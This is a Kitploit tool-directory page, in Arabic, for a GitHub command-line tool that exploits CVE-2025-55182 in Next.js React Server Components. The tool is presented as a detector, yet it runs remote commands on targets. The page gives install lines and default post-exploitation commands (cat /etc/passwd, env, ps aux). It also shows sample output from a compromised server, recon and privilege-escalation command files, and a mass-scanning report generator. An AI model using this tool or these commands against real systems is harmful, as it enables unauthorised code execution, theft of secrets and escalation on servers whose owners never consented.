Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/rix4uni/cve-2025-55182
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرة
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

أداة سطر أوامر للكشف عن CVE-2025-55182 وCVE-2025-66478 في تطبيقات Next.js التي تستخدم React Server Components.

عرض المستودع
61منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182

أداة سطر أوامر لكشف CVE-2025-55182 وCVE-2025-66478 في تطبيقات Next.js التي تستخدم React Server Components.

🚀 التثبيت

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ الاستخدام

ماسح CVE-2025-55182

الصيغة الأساسية

root@kitploit:~
CVE-2025-55182 -d https://example.com

الخيارات

ملاحظة: إذا لم يتم توفير خيارات أوامر، يتم تنفيذ الأوامر الافتراضية.

الأوامر الافتراضية

تنفذ الأداة هذه الأوامر افتراضيًا:

  1. cat /etc/os-release - معلومات نظام التشغيل
  2. whoami - المستخدم الحالي
  3. pwd - دليل العمل الحالي
  4. id - معرف المستخدم والمجموعات
  5. uname -a - معلومات النظام
  6. hostname -I - واجهات الشبكة
  7. ls -la - قائمة محتويات الدليل
  8. cat /etc/passwd - حسابات المستخدمين
  9. env - متغيرات البيئة
  10. ps aux - العمليات الجارية

مولّد التقارير

أداة reportgenerator تنشئ تلقائيًا تقارير احترافية للإفصاح عن الثغرات من نتائج الفحص.

الميزات

  • فحص متوازٍ لأهداف متعددة
  • ترقيم تلقائي يحافظ على التقارير الموجودة (بدون استبدال)
  • تقارير markdown احترافية تتضمن قسم الإفصاح عن الثغرات الأمنية
  • اسم باحث قابل للتخصيص وملف إدخال

الاستخدام الأساسي

root@kitploit:~
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Run report generator
reportgenerator

الخيارات

العلامةالوصفالافتراضي
--fileملف الإدخال الذي يحتوي على النطاقات المستهدفةsubs.txt
--userاسم الباحث لقسم الإفصاحBhagirath Saxena

أمثلة

root@kitploit:~
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator

# Use custom target file
reportgenerator --file targets.txt

# Use custom researcher name
reportgenerator --user "John Doe"

# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"

هيكل المخرجات

يتم إنشاء التقارير في دليلين:

  • textfile/ - مخرجات الفحص الخام (مرقمة: 1.txt، 2.txt، إلخ.)
  • mdfile/ - تقارير markdown احترافية (مرقمة: 1.md، 2.md، إلخ.)

ملاحظة: تضمن ميزة الترقيم التلقائي عدم استبدال التقارير الموجودة أبدًا. تستمر عمليات الفحص الجديدة من أعلى رقم موجود.

تنسيق التقرير

يتضمن كل تقرير يتم إنشاؤه:

  1. الإفصاح عن الثغرات الأمنية - خطاب تقديم احترافي
  2. الهدف - النطاق المختبر
  3. الأوامر المنفذة - قائمة الأوامر التي تم تشغيلها أثناء الاختبار
  4. ملخص الثغرة - تفاصيل CVE وتقييم الأثر
  5. تفاصيل الاستغلال - مخرجات الأوامر مع حالة التنفيذ
  6. ملخص التنفيذ - جدول يوضح نجاح/فشل كل أمر
  7. تحليل الأثر - تقييم الخطورة والملاحظات
  8. التوصيات - خطوات المعالجة لفريق الأمان
  9. المراجع - روابط لتفاصيل CVE والتنبيهات الأمنية

🎨 أمثلة على المخرجات

استغلال ناجح

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

نجاح جزئي

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 التفاصيل التقنية

الثغرة

  • CVE: CVE-2025-55182
  • النوع: تلوث النموذج الأولي (Prototype Pollution) → تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • المتأثر: تطبيقات Next.js ذات إعدادات محددة
  • ناقل الهجوم: طلب HTTP POST مع بيانات multipart/form-data مُعدّة بعناية
  • الأثر: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة بصلاحيات مستخدم التطبيق

📚 المراجع

  • تفاصيل CVE-2025-55182
  • التنبيهات الأمنية لـ Next.js

أمثلة على دليل commands/:

أنشئ ملفات أوامر نموذجية لسيناريوهات مختلفة:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
تنزيل الأداة
الخيارالوصفالافتراضي
-d, --domainعنوان الهدف (يضيف https:// تلقائيًا في حال عدم وجود بروتوكول)http://localhost:3000
-c, --commandأمر واحد للتنفيذ-
-m, --multipleأوامر متعددة مفصولة بفواصل منقوطة-
-f, --fileملف يحتوي على أوامر (أمر واحد في كل سطر)-
-h, --helpإظهار رسالة المساعدة-